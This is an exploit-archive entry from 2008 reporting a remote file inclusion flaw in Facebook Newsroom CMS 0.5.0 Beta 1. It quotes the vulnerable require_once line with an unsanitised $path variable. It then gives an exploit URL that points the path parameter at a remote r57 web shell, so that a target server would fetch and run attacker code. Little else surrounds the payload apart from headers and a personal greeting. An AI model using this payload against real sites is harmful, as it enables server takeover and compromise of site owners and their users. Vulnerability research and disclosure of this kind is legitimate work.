id: 3382
date: 07/10/2008
title: Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability
author: Ciph3r
cves: 

======================================================================
Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability
======================================================================



#####################################################################
#
# Facebook Newsroom Application Remote File Inclusion Vulnerability
#
#####################################################################
#
# Discovered by : Ciph3r    
#
# class : remote
#
# risk : high
#
# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d 
#######################################################################
#
# C0de : 
#
#               
#    require_once ($path.'/classes/feedStories.class.php');
#
#
#######################################################################

 EXPLOIT :

 

 www.[Target].com/path/includes/home.php?path=[r57.txt?]


#######################################################################



#  0day.today [2023-03-25]  #